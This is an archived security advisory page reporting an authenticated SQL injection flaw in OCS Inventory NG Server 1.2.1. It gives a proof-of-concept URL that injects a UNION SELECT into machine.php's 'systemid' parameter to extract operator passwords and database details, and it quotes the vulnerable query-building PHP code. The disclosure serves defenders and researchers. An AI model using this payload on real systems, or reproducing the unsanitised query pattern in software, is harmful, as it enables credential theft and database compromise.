TUCoPS :: HP Unsorted S :: bt-21463.htm

Sql injection in OCS Inventory NG Server 1.2.1
Sql injection in OCS Inventory NG Server 1.2.1
Sql injection in OCS Inventory NG Server 1.2.1


OCS Inventory NG Server 1.2.1

Details:

The Open Computer and Software (OCS) Inventory Next Generation (NG)
provides relevant inventory information about system configurations and
software on the network.

Download : http://www.ocsinventory-ng.org/index.php?page=1-02-1 
 Found by : Guilherme Marinheiro				
Contact : gmcbr0@gmail.com 
 Prequisite: Authenticated user				
 Remote exploitable:Yes (Authentication is needed)		

PoC :
http://localhost/ocsreports/machine.php?systemid=1)%20union%20select%201,2,user(),3,5,6,7,8,9,10,11,12,passwd,14,15,16,17,18,id,20,21,22,23,24,25,26,27,27,version()%20from%20operators%20-- 

Vulnerable Code:

script: machine.php

77 $queryMachine    = "SELECT * FROM hardware WHERE (ID=$systemid)";
78 $result   = mysql_query( $queryMachine, $_SESSION["readServer"] )
or mysql_error($_SESSION["readServer"]);
79 $item     = mysql_fetch_object($result);

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH